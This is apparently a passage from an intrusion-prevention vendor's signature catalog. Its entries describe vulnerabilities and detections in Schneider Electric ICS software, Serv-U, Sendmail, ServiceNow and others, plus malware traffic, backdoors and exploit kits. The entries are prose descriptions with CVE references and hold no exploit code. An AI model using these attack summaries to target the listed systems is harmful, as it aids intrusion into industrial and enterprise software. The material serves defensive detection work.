Schneider-Electric-PLC-ETY-Denial-Of-Service

About this vulnerability:	A vulnerability in Schneider Electric ETY series telnet server allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Schneider Electric PLC ETY
Type:	Malfunction
Description:	A vulnerability exists in Schneider Electric ETY series telnet servers where an attacker can call a telnet instance from within an existing telnet instance which causes the device to crash.
Situation:	Telnet_TC-Schneider-Electric-PLC-ETY-Denial-Of-Service

Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Schneider Electric ProClima. The vulnerability is due to a heap buffer overflow when processing user supplied parameter input to SetHtmlFileName in the Atx45.ocx ActiveX control. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.

Situation:

File-Text_Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow

References:

CVE-2014-8511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8511

OSVDB-116783
http://www.osvdb.org/116783

Schneider-Electric-Proclima-F1bookview-Attach-Memory-Corruption

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Schneider Electric ProClima. A remote attacker can use this to acchieve arbitrary code execution in the affected system.

Situation:

File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption

References:

CVE-2015-7918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7918

Schneider-Electric-Proclima-F1bookview-Attachtoss-Memory-Corruption

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-721-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Malfunction

Description:

A flaw in the AttachToSS() method of the F1BookView ActiveX control may cause memory corruption, which can be leveraged to allow remote code execution.

Situation:

File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption

References:

CVE-2015-8561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8561

Schneider-Electric-Proclima-F1bookview-Copyall-Memory-Corruption

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-719-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Schneider Electric ProClima. The vulnerability is due to a flaw in the CopyAll() method of the F1BookView ActiveX control, in which a user-supplied integer is interpreted as a memory address. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim user to browse to a malicious Web page. Successful exploitation could lead to arbitrary code execution under context of the user.

Situation:

File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption

References:

CVE-2015-8561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8561

Schneider-Electric-Proclima-F1bookview-Setvalidationrule-Memory-Corruption

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Schneider Electric ProClima. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption

References:

CVE-2015-7918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7918

Schneider-Electric-Proclima-Metadraw-Arrangeobjects-Memory-Corruption

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Schneider Electric ProClima. The vulnerability is due to the dereferencing of an attacker-supplied memory address by the MetaDraw ActiveX control's ArrangeObjects method. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.

Situation:

File-Text_Schneider-Electric-Proclima-Metadraw-Several-Vulnerabilities

References:

CVE-2014-9188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9188

OSVDB-116782
http://www.osvdb.org/116782

Schneider-Electric-Proclima-Metadraw-ObjLinks-Remote-Code-Execution

About this vulnerability:

A vulnerability in Schneider Electric ProClima

Risk:

Moderate

First detected in:

sgpkg-ips-658-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ProClima

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Schneider Electric ProClima. The issue is due to an input validation error when processing user supplied parameter input in the MDraw30.ocx ActiveX control. A remote unauthenticated attacker could exploit this vulnerability by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the browser process.

Situation:

File-Text_Schneider-Electric-Proclima-Metadraw-Several-Vulnerabilities

References:

CVE-2014-8514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8514

OSVDB-116781
http://www.osvdb.org/116781

Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass

About this vulnerability:

A vulnerability in Schneider Electric ClearSCADA 2010

Risk:

High

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ClearSCADA

Type:

Input Validation

Description:

An information disclosure vulnerability exists in Schneider Electric SCADA Expert ClearSCADA. This vulnerability is due to insufficient restrictions of the preconfigured guest account. A remote attacker can exploit this vulnerability to disclose sensitive system information.

Situation:

Generic_CS-Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass

References:

CVE-2014-5412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5412

OSVDB-111239
http://www.osvdb.org/111239

Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service

About this vulnerability:

A vulnerability in Schneider Electric ClearSCADA 2010

Risk:

Moderate

First detected in:

sgpkg-ips-612-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ClearSCADA

Type:

Input Validation

Description:

A denial of service vulnerability exists in Schneider Electric SCADA Expert ClearSCADA. The vulnerability is due to insufficient validation of incoming requests. A remote attacker can exploit this vulnerability by enticing an authenticated user to view crafted web content. This can result in a denial of service condition.

Situation:

HTTP_CSU-Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service

References:

CVE-2014-5411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5411

OSVDB-111238
http://www.osvdb.org/111238

Schneider-Electric-Somachine-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference

About this vulnerability:

A vulnerability in Schneider Electric SoMachine HVAC

Risk:

Moderate

First detected in:

sgpkg-ips-784-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric SoMachine HVAC

Type:

Input Validation

Description:

The AxEditGrid ActiveX control of Schneider Electric SoMachine HVAC is vulnerable to an untrusted pointer dereference. A successful exploitation allows an attacker to run arbitrary code on the target system.

Situation:

File-Text_Schneider-Electric-Somachine-Hvac-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference

References:

CVE-2016-4529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4529

Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection

About this vulnerability:

A vulnerability in Schneider Electric Struxureware Data Center Expert

Risk:

Moderate

First detected in:

sgpkg-ips-1394-5242

Last changed:

sgpkg-ips-1394-5242

Platform:

Generic

Software:

Schneider Electric Struxureware Data Center Expert

Type:

Input Validation

Description:

There exists a command-injection vulnerability in Schneider Electric Struxureware Data Center Expert. Successful exploitation could lead in arbitrary command execution.

Situation:

HTTP_CRL-Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection

References:

CVE-2021-22795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22795

Schneider-Electric-Struxureware-Data-Center-Expert-Fwupd-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric Struxureware Data Center Expert

Risk:

Moderate

First detected in:

sgpkg-ips-1397-5242

Last changed:

sgpkg-ips-1397-5242

Platform:

Generic

Software:

Schneider Electric Struxureware Data Center Expert

Type:

Directory Traversal

Description:

Improper handling of user-supplied input causes a directory traversal vulnerability in Schneider Electric Struxureware Data Center Expert. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-Schneider-Electric-Struxureware-Data-Center-Expert-Firmware-Update-Directory-Traversal

References:

CVE-2021-22794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22794

Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion

About this vulnerability:

A Schneider Electric U.motion Builder css.inc.php Arbitrary File Inclusion vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-935-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Schneider Electric U.motion Builder

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and before, which allows remote attackers to obtain sensitive information by sending a malicious request to the server, due to improper input sanitization.

Situation:

HTTP_CRL-Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion

References:

CVE-2017-7974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7974

Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection

About this vulnerability:

A Schneider Electric U.motion Builder loadtemplate.php SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-937-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Schneider Electric U.motion Builder

Type:

SQL Injection

Description:

An SQL injection vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and prior, due to insufficient validation of the tpl parameter in the loadtemplate.php request, which allows remote attackers to execute arbitrary SQL commands.

Situation:

HTTP_CRL-Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection

References:

CVE-2017-7973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7973

Schneider-Electric-U.motion-Builder-Localize-SQL-Injection

About this vulnerability:

A vulnerability in Schneider Electric U.motion Builder

Risk:

Moderate

First detected in:

sgpkg-ips-945-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric U.motion Builder

Type:

Input Validation

Description:

Insufficient validation of HTTP requests causes an SQL injection vulnerability in Schneider Electric U.motion Builder. Successful exploitation of the vulnerability allows an attacker to execute arbitrary SQL or possibly arbitrary code on the target system.

Situation:

HTTP_CRL-Schneider-Electric-U.motion-Builder-Localize-SQL-Injection

References:

CVE-2017-7973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7973

Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection

About this vulnerability:

A Schneider Electric U.motion Builder nfcserver.php SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-983-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Schneider Electric U.motion Builder

Type:

SQL Injection

Description:

A vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and before, which allows remote attackers to execute arbitrary SQL commands through the sessionid request parameter, due to insufficient validation.

Situation:

HTTP_CRL-Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection

References:

CVE-2017-7973
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7973

Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal

About this vulnerability:

A Schneider Electric U.motion Builder runscript.php Directory Traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-937-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Schneider Electric U.motion Builder

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Schneider Electric U.motion Builder, versions 1.2.1 and prior, which allows remote attackers to gain sensitive information by sending a crafted request, due to insufficient input validation to the runscript.php script.

Situation:

HTTP_CRL-Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal

References:

CVE-2017-7974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7974

Schneider-Electric-U.motion-Builder-Track-SQL-Injection

About this vulnerability:	A vulnerability in Schneider Electric U.motion Builder
Risk:	Moderate
First detected in:	sgpkg-ips-941-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Schneider Electric U.motion Builder
Type:	Input Validation
Description:	Insufficient validation of user input results in an SQL injection vulnerability in Schneider Electric U.motion Builder. A successful exploit allows an attacker to perform arbitrary SQL commands on the target system.
Situation:	HTTP_CRL-Schneider-Electric-U.motion-Builder-Track-SQL-Injection

Schneider-Electric-Unity-Pro-Denial-Of-Service

About this vulnerability:	A vulnerability in Schneider Electric Unity Pro allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Schneider Electric Unity
Type:	Malfunction
Description:	A vulnerability exists in Schneider Electric Unity Pro where an attacker can send custom TCP packets causing a denial of service condition where sim.exe experiences memory corruption leading to process termination.
Situation:	Generic_CS-Schneider-Electric-Unity-Pro-Denial-Of-Service

Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric VAMPSET

Risk:

Moderate

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric VAMPSET

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability exists in Schneider Electric VAMPSET software. The vulnerability is due to improper processing of specific parameters within CFG and DAT files of a COMTRADE record. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim to open a maliciously crafted COMTRADE record. Successful exploitation could lead to attacker-controlled code execution.

Situation:

File-TextId_Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow

References:

CVE-2014-8390
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8390

OSVDB-120041
http://www.osvdb.org/120041

Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service

About this vulnerability:	A vulnerability in Schneider Electric Vijeo Web Gate Server allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Schneider Electric Vijeo Web Gate Server
Type:	Malfunction
Description:	A vulnerability exists in Schneider Electric Vijeo Web Gate Server allowing an attacker to cause a denial of service condition by sending specially crafted data to TCP port 80.
Situation:	HTTP_CS-Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service

Schneider-Electric-Vijeo-Web-Gate-Server-Directory-Traversal

About this vulnerability:	A vulnerability in Schneider Electric Viejo Web Gate Server
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Schneider Electric Vijeo Web Gate Server
Type:	Malfunction
Description:	There is a directory traversal vulnerability in Schneider Electric Vijeo Web Gate Server.
Situation:	HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities

Schneider-Electric-Web-Designer-ServerSimulator-RCE

About this vulnerability:	A vulnerability in Schneider Electric Web Designer
Risk:	High
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Schneider Electric Web Designer
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in Schneider Electric Web Designer which allows a remote attacker to run arbitrary code within the target system.
Situation:	Generic_CS-Schneider-Electric-Web-Designer-ServerSimulator-RCE

School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609

About this vulnerability:

A vulnerability in School Management Pro WordPress plugin

Risk:

High

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

WordPress

Type:

Backdoor

Description:

WordPress plugin School Management Pro premium versions before 9.9.7 were reported to include a backdoor. Unauthenticated attackers could use the backdoor to execute arbitrary PHP code.

Situation:

HTTP_CRL-School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609

References:

CVE-2022-1609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609

Schweitzer-SEL-2032-Commands

About this vulnerability:	Configuration commands related with Schweitzer SEL-2032 operation
Risk:	Moderate
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Schweitzer SEL-2032
Type:	Misconfiguration
Description:	User commands related with Schweitzer SEL-2032 communication processor. Detecting these commands may indicate unauthorized access to configuration tools.
Situation:	Telnet_CS-Schweitzer-SEL-2032-File-Upload Telnet_CS-Schweitzer-SEL-2032-Status-Command Telnet_CS-Schweitzer-SEL-2032-Session-Logout Telnet_Schweitzer-SEL-2032-Access-Password-Disabled Telnet_Schweitzer-SEL-2032-Change-Password Telnet_Schweitzer-SEL-2032-View-Passwords-Attempt Telnet_Schweitzer-SEL-2032-Access-Attempt Telnet_Schweitzer-SEL-2032-Device-Poll-All Telnet_Schweitzer-SEL-2032-Point-Not-Available Telnet_Schweitzer-SEL-2032-Failed-Configuration-Change Telnet_Schweitzer-SEL-2032-Port-Configuration-Change Telnet_Schweitzer-SEL-2032-Failed-Time-Change Telnet_Schweitzer-SEL-2032-Time-Change Telnet_Schweitzer-SEL-2032-IP-Address-Change Telnet_Schweitzer-SEL-2032-Access-Denied Telnet_Schweitzer-SEL-2032-Successful-Login Telnet_Schweitzer-SEL-2032-Modem-Status-Changed Telnet_Schweitzer-SEL-2032-Successful-Configuration-Change

Script-In-HTTP-POST

About this vulnerability:	A script was detected in a HTTP POST request
Risk:	Moderate
First detected in:	sgpkg-ips-493-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	A script was detected in a HTTP POST request. This is not necessarily malicious, but may be unwanted in some environments.
Situation:	HTTP_CS-Script-In-HTTP-POST

Script-Self-Reference

About this vulnerability:	A script with a self refence
Risk:	Moderate
First detected in:	sgpkg-ips-138-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic HTTP client
Type:	Javascript Injection
Description:	Most web browsers contain an embedded scripting interpreter, such as JavaScript or Visual Basic Script. The interpreter allows a script to access the environment where is script is running, including the running script itself. This allows the script to modify itself at runtime, possibly hiding the real activity.
Situation:	HTTP_SS-JavaScript-Self-Reference File-Text_JavaScript-Self-Reference

Script-Tag-In-URI

About this vulnerability:	A script tag was found in an URI
Risk:	Moderate
First detected in:	sgpkg-ips-515-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Cross-site Scripting
Description:	A script tag was found in an URI. This may be an attempted cross-site scripting attack.

Seagate-Business-NAS-Remote-Code-Execution

About this vulnerability:

A Seagate Business NAS Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Seagate Business NAS

Type:

Insecure Configuration

Description:

A vulnerability in Seagate Business NAS, within the language parameter of the CodeIgniter session cookie, which allows un-authenticated users to decrypt a cookie using a known static encryption key, modify the PHP object string, and re-encrypt, allowing local file uploads and command execution. Associated CVEs CVE-2014-8686 and CVE-2014-8687.

Situation:

HTTP_CS-Seagate-Business-NAS-Remote-Code-Execution

References:

CVE-2014-8684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8684

SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities

About this vulnerability:

A vulnerability in SearchBlox

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SearchBlox

Type:

Input Validation

Description:

There exists multiple authentication bypass vulnerabilities in SearchBlox. A remote attacker can use this to acchieve a denial of service condition.

Situation:

HTTP_CS-SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities

References:

CVE-2015-7919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7919

BID-78552
http://www.securityfocus.com/bid/78552

Searchmyrequest

About this vulnerability:	SearchMyRequest
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SearchMyRequest
Type:	Code Injection
Description:	SearchMyRequest is a Troijan that hijacks Internet Explorer and directs the user to unwanted sites.
Situation:	HTTP_CSH-Searchmyrequest

Security-Management-Center-Failed-Login

About this vulnerability:	A brute-force attack against Security Management Server was detected
Risk:	High
First detected in:	sgpkg-ips-1253-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A brute-force attack against Security Management Server (SMC) has been detected.
Situation:	HTTP_SLS-Security-Management-Center-Failed-Login

Sednit-Exploit-Kit

About this vulnerability:	Sednit Exploit Kit
Risk:	High
First detected in:	sgpkg-ips-822-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Sednit is an exploit kit which has been known to be used in infiltrating government and military targets.
Situation:	File-Text_Sednit-Exploit-Kit-Landing-Page

Selenium-Chrome-RCE

About this vulnerability:

A vulnerability in Selenium Grid

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Linux

Software:

Selenium Grid

Type:

Input Validation

Description:

A vulnerability in Selenium Grid, versions before 4.0.0-alpha-7, allows remote attackers to execute arbitrary code through non-JSON content types.

Situation:

HTTP_CS-Selenium-Chrome-RCE

References:

CVE-2022-28108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28108

Self-Signed-Certificate-With-Default-Values

About this vulnerability:	A self-signed certificate with default values was detected
Risk:	High
First detected in:	sgpkg-ips-1408-5242
Last changed:	sgpkg-ips-1408-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A self-signed certificate with default values was detected. The certificate with these default values is used by some malware families like Emotet. Setting the action of this situation blocking in your policy may lead into legit traffic termination.
Situation:	TLS_SS-Self-Signed-Certificate-With-Default-Values

Sendmail-Etrn-DoS

About this vulnerability:

Sendmail ETRN Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sendmail

Type:

Malfunction

Description:

The Sendmail daemon sleeps 5 seconds for each ETRN command received. Therefore, multiple ETRN commands can lead to denial of service.

Situation:

SMTP_Etrn-Sendmail-DoS

References:

CVE-1999-1109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1109

BID-904
http://www.securityfocus.com/bid/904

Sendmail-Mime-BOF

About this vulnerability:

Sendmail MIME Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; BSD

Software:

Sendmail

Type:

Buffer Overflow

Description:

Sendmail contains a buffer overflow vulnerability in the MIME handling that could be exploited to gain a complete system control.

Situation:

SMTP_Sendmail-Mime-BOF

References:

CVE-1999-0047
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0047

BID-685
http://www.securityfocus.com/bid/685

Serendipity-FrontPage-SQL-Injection

About this vulnerability:

SQL injection vulnerability in S9Y Serendipity

Risk:

High

First detected in:

sgpkg-ips-160-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

S9Y Serendipity

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in S9Y Serendipity, web logging (blogging) software written in the PHP scripting language. The software fails to sanitize the user-supplied data which allows injection of SQL commands and may lead to system compromise.

Situation:

HTTP_CRL-Serendipity-FrontPage-SQL-Injection

References:

CVE-2007-1326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1326

BID-22774
http://www.securityfocus.com/bid/22774

OSVDB-34935
http://www.osvdb.org/34935

Serv-U-FTP-Server-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Rhino Software Serv-U FTP Server

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Serv-U FTP Server

Type:

Buffer Overflow

Description:

In the Serv-U FTP server prior to version 4.2, there is a vulnerability in the processing of the FTP command SITE CHMOD command. Due to insufficient boundary checks on the input parameter (a file-name), an attacker can input excessively long data and overflow a buffer. Successfully exploiting this vulnerability allows the attacker to run code of their choice in the security context of the current FTP service, in many cases this will give the attacker complete control over the system. Once the exploit has executed its shell code successfully, the attacked target's ftp service will survive, an reverse command shell will be established between the target system and the attacker's host. The attacker could gain the control of the vulnerable Windows system. If the exploit was not successful, Serv-U ftp service will crash, and the ftp service need to be restarted in order to continue working.

Situation:

FTP_CS-Serv-U-FTP-Server-Command-Buffer-Overflow

References:

CVE-2004-2111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2111

BID-9483
http://www.securityfocus.com/bid/9483

Serv-U-List-Parameter-Buffer-Overrun

About this vulnerability:

A vulnerability in Rhino Software Serv-U FTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Serv-U FTP Server

Type:

Malfunction

Description:

Serv-U FTP server, a popular Windows FTP server, is vulnerable to a buffer overrun. Serv-U FTP server versions 5.0.0.4 and below do not correctly validate input when an FTP LIST or NLST command is run with long malformed parameters. An attack using this vulnerability can crash the remote FTP service on the remote target. Upon successful attack, the remote Serv-U FTP server will terminate (causing a denial of service). The administrator of the vulnerable system must restart the Serv-U FTP server for the service to resume.

Situation:

FTP_CS-Serv-U-List-Parameter-Buffer-Overrun

References:

CVE-2004-1992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1992

BID-10181
http://www.securityfocus.com/bid/10181

OSVDB-5546
http://www.osvdb.org/5546

Serv-U-Stou-Command-DoS

About this vulnerability:

Serv-U FTP server is vulnerable to denial of service attack

Risk:

Low

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Serv-U FTP Server

Type:

Malfunction

Description:

Serv-U FTP version 5.2 and earlier are vulnerable to a Denial of Service (DoS) attack because of improper validation of arguments. A remote attacker could send a specially crafted STOU command that contains a reserved DOS device name to cause the service to crash.

Situation:

FTP_CS-Serv-U-Stou-Command-DoS

References:

BID-11155
http://www.securityfocus.com/bid/11155

OSVDB-9898
http://www.osvdb.org/9898

Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210

About this vulnerability:

An attempt to exploit a vulnerability in Oracle WebLogic Server detected

Risk:

High

First detected in:

sgpkg-ips-1580-5242

Last changed:

sgpkg-ips-1580-5242

Platform:

Generic

Software:

Oracle WebLogic Server

Type:

Insecure Configuration

Description:

In the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0, the SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the server to connect to an arbitrary TCP port of an arbitrary host. The responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.

Situation:

HTTP_CSU-Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210

References:

CVE-2014-4210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4210

Server-Version-Number-Disclosure

About this vulnerability:	Version number was in HTTP server reply header
Risk:	Low
First detected in:	sgpkg-ips-565-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Generic HTTP server
Type:	Insecure Configuration
Description:	Revealing version numbers in HTTP reply headers can be considered as harmful configuration disclosure when it clues an attacker of potential vulnerabilities.
Situation:	HTTP_SHS-Server-Version-Number-Disclosure

ServHelper-Malware-Infection-Traffic

About this vulnerability:	ServHelper Malware infection traffic
Risk:	High
First detected in:	sgpkg-ips-1358-5242
Last changed:	sgpkg-ips-1358-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	ServHelper malware infection traffic was detected.
Situation:	HTTP_CRL-ServHelper-Malware-Infection-Traffic

ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879

About this vulnerability:

A vulnerability in ServiceNow

Risk:

Critical

First detected in:

sgpkg-ips-1756-5242

Last changed:

sgpkg-ips-1756-5242

Platform:

Generic

Software:

ServiceNow

Type:

Input Validation

Description:

A pre-authenticated remote code execution vulnerability has been reported in the ServiceNow Vancouver and Washington DC Now Platform releases.

Situation:

HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879

References:

CVE-2024-4879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4879

ServiceNow-Now-Platform-Sensitive-File-Read-CVE-2024-5178

About this vulnerability:

A vulnerability in ServiceNow

Risk:

High

First detected in:

sgpkg-ips-1819-5242

Last changed:

sgpkg-ips-1819-5242

Platform:

Generic

Software:

ServiceNow

Type:

Input Validation

Description:

A sensitive file read vulnerability has been reported in the Service Now Washington DC, Vancouver, and Utah Now Platform releases. This vulnerability can be chained together with CVE-2024-4879 and CVE-2024-5217 for a full compromise of the vulnerable product.

Situation:

HTTP_CSU-ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879

References:

CVE-2024-5178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5178

ServiceNow-Now-Platform-Template-Injection-CVE-2024-5217

About this vulnerability:

A vulnerability in ServiceNow

